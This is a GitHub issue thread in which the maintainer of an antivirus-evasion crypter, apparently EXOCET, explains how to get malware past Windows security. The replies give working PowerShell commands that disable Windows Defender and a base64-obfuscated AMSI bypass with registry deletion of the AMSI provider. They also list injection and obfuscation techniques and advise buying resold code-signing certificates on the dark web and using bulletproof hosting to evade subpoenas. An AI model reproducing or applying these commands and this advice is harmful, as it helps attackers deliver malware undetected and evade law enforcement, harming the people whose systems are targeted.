It has been marked as malicious by windows defender

[noonewhoim]

Is there any way to solve it?

[tanc7]

I will be working on it after my accounting exam on Wednesday. I assume go-memexec got picked up?

Sent from my iPhone

On Sep 27, 2021, at 2:33 AM, noonewhoim @.***> wrote:

 Is there any way to solve it?

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android.

[KianPrism]

Any news on this?

[tanc7]

Hi, sorry I am busy with multiple projects right now including Accounting and Finance classes and upcoming participation in the National Cyber League this week and a private crypto tax documentation tool utilizing the CoinGeckoAPI, but I am working on it.

Currently a proposed solution is to combine tools such as gobfuscate or garble to obfuscate the usage of package names, imports, and functions prior to the .go file payload compilation. In my test builds, I have also added full in memory shellcode execution. The current build available on GitHub actually drops a temporary file and then executes it in memory and deletes it, which I used because it was a less well-known method used to evade AV and worked in early 2020. As go-memexec is being picked up more now, I am switching to newer methods.

Since packages like gobfuscate expect a entire go app to be made instead of targeting a specific .go file, I need to make gobfuscate or garble work in a way that it’s not supposed to. My upcoming solution is to manually call the functions from the package to help conceal its activity. We will be emulating BlackRota, but not entirely copying it’s tactics (or it will just get picked up by AV again) https://threatpost.com/blackrota-golang-backdoor-obfuscation/161544/

I have a checklist of 15 different methods to try, like in-line hooking, reflective DLL injection, process hollowing, and remote process injection, so please be patient.

Currently, obfuscating the Go crypter that is generated is the best way to make the payload work while maintaining cross-platform compatibility. Many of the other mentioned techniques is restricted to specific platforms like Windows.

I am also willing to accept merge requests as well from those who like to contribute. Currently I am looking for individuals able to write a TheadLocalStorage Callback, a Registration of a Top-Level Exception Handler, and those that can do low level programming by using CGO.

Sent from my iPhone

On Oct 11, 2021, at 4:02 AM, kianj2001 @.***> wrote:

 Any news on this?

— You are receiving this because you commented. Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android.

[lu4p]

Garble should be able to obfuscate a 'single' file, or anything which can be done in a go build command garble build file.go.

[tanc7]

Hi everyone, I am currently looking through the materials for the OSEP course (Offensive Security Experienced Penetration Tester). I highly recommend czonta96's link. As of right now there are tons of obstacles introduced since Windows 8.1, including but not limited to, AMSI bypasses, Windows Defender's scantime and runtime detection. That, and I am balancing multiple personal issues in my life right now, like getting my house fixed up from the FBI raid, dental appointments (their suggested bill is over $46,000 for my treatment), medical appointments, counseling appointments, and balancing between studying cyber and finance, as well as using what I have learned in my BSBA of Accounting every day.

Until I update the repo, I suggest using a combination of powershell scripts and .NET commands such as Powershell Reflection, patching of running processes, and registry modifications to shut down AMSI (as it works independently of WinDefend.exe). In Windows 10, the Windows Script Host (cscript.exe) can run jscript files (it's a Microsoft version of JavaScript that also can implement .NET Assembly code as well as other MS scripting languages like vbs and wscript) to help you bypass Defender by creation of a JScript shellcode runner.

Furthermore there is a great link from IppSec IppSec Obfuscating Mimikatz to dissect the binary in question using the head -c command to slice up the binary from the beginning to find what is being flagged by signature detection, or the tail -c command to slice the bytes from the bottom, have it scanned until you reach specific byte offsets, hex dumping it with xxd -p binary, and then manually rewriting Exocet (change the offending characters and function calls from upper to lower and vice-versa, and detect whether or not it's the Exocet decrypter stub or the payload itself that requires modification).

Exocet is a extremely simple app that ingests detectable malware and adds it's own layer of encoding and encryption. At the time of it's release, it was undetectable for about 8 months (until I went back to prison). Now it's being detected as a variant of trickbot and generic droppers.

Multiple Stages Required to Bypass Win10+ AV and Threat Mitigations

Any future updates that I make to EXOCET will require platform specific bypasses, Windows require the bypass of UAC, Defender, AMSI, AppLocker, Controlled Folder Access, Tamper Protection, SmartScreen etc. This will require the generation and execution of multiple stages before the final payload is delivered.

Killing Windows Defender

The following Powershell commands can be run after bypassing Tamper Protection to shut down Defender

Set-MpPreference -LowThreatDefaultAction Allow -Force
Set-MpPreference -MAPSReporting disabled -Force
Set-MpPreference -ModerateThreatDefaultAction Allow -Force
Set-MpPreference -SevereThreatDefaultAction Allow -Force
Set-MpPreference -UnknownThreatDefaultAction Allow -Force
Set-MpPreference -DisableRealtimeMonitoring $true -Force
Set-MpPreference -DisableArchiveScanning $true -Force
Set-MpPreference -DisableBehaviorMonitoring $true -Force
Set-MpPreference -DisableBlockAtFirstSeen $true -Force
Set-MpPreference -DisableEmailScanning $true -Force
Set-MpPreference -DisableIntrusionPreventionSystem $true -Force
Set-MpPreference -DisableIOAVProtection $true -Force
Set-MpPreference -DisableRealTimeMonitoring $true -Force
Set-MpPreference -DisableScriptScanning $true -Force
Set-ExecutionPolicy unrestricted -Force
cmd.exe sc stop WinDefend

AMSI Bypasses in a Powershell Stager

Fortunately, AMSI has only been adopted by 11 or so AV solutions so far, and can still be bypassed by encoding a AMSI killer one liner in base64 like this

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
Set-MpPreference -DisableRealtimeMonitoring $true

Code-Signing Certificate Issue (SmartScreen)

However, on my Windows 11 developer edition VM Which can be obtained here for free, mandatory code-signing checks are enforced. Meaning that without a code-signing certificate from a approved vendor that works with Microsoft, running a JScript Shellcode Runner will still alert the user with SmartScreen. Fortunately, a lot of legitimate apps do not have code-signing certificates for their apps and the end-user may be accustomed to allowing the payload to run anyways.

Attempting to legitimate the stages of your payload by purchasing code-signing certificates can start at over a thousand dollars. And while I am not going to and will not enable the conspiracy or commission of criminal activity, reuseable code-signing certificates are often resold on the dark web for around the $200 range. But this is part (code-signing) is something you'll figure out yourself.

[tanc7]

Yes. But unfortunately commercial VPNs like IPVanish will respond to federal subpoenas. I read it in court discoveries of a guy in Chicago. Poor dude bought 200 hacked twitter accounts and thought he could hide behind IPVanish, then because of that he got superseded by CFAA after being charged with terrorism.

Best option is to use bulletproof VPNs or even better, make your own VPN with WireGuard. I wouldn’t trust IPSec.

Anyways I’m through with black hat stuff and just play CTFs now and periodically writing code, as well as pursuing my second college degree and managing my family’s brokerage account on Fidelity. My supervised release conditions forbid me from any job involving computers or handling personally identifiable information, even as a cashier at Walmart. Planning to move to Argentina when my 29 months are up.

On Sun, Jan 23, 2022 at 7:37 PM Mart3s @.***> wrote:

Your house fixed by FBI raid lol A good VPN is a thing to prevent that annoyers from knocking your door

— Reply to this email directly, view it on GitHub https://github.com/tanc7/EXOCET-AV-Evasion/issues/4#issuecomment-1019685465, or unsubscribe https://github.com/notifications/unsubscribe-auth/AGKJDJSNPNXMH5IULX2ARTDUXTCQ3ANCNFSM5E2DHPKQ . Triage notifications on the go with GitHub Mobile for iOS https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675 or Android https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub.

You are receiving this because you commented.Message ID: @.***>

[tanc7]

I can only answer this question in a manner that it could not incriminate me or get me indicted. I suggest heavy research into “bulletproof hosting” providers, spin up a VPS and convert it into a client-to-site VPN. AlgoVPN does just that, which is a collection of Ansible scripts to quickly configure a secure WireGuard VPN endpoint.

https://github.com/trailofbits/algo

If you own the data, and have firm control over who logs it, your “mostly” clean. You just have to trust your hosting providers. Some of them offer warrant canaries, usually a PGP key to verify the service they are providing is “solid”.

On the flip side, some bulletproof hosting providers have flipped to the Feds, I personally know a handful of inmates who confirmed it from the InFraud Indictment in Federal prison in Pahrump, NV.

Just be careful and do clear research.

I even shook R. Kelly’s hand at Chicago MCC in late 2019.

Sent from my iPhone

On Jan 24, 2022, at 4:30 AM, Mart3s @.***> wrote:

 Is Nord VPN good?

— Reply to this email directly, view it on GitHub, or unsubscribe. Triage notifications on the go with GitHub Mobile for iOS or Android. You are receiving this because you commented.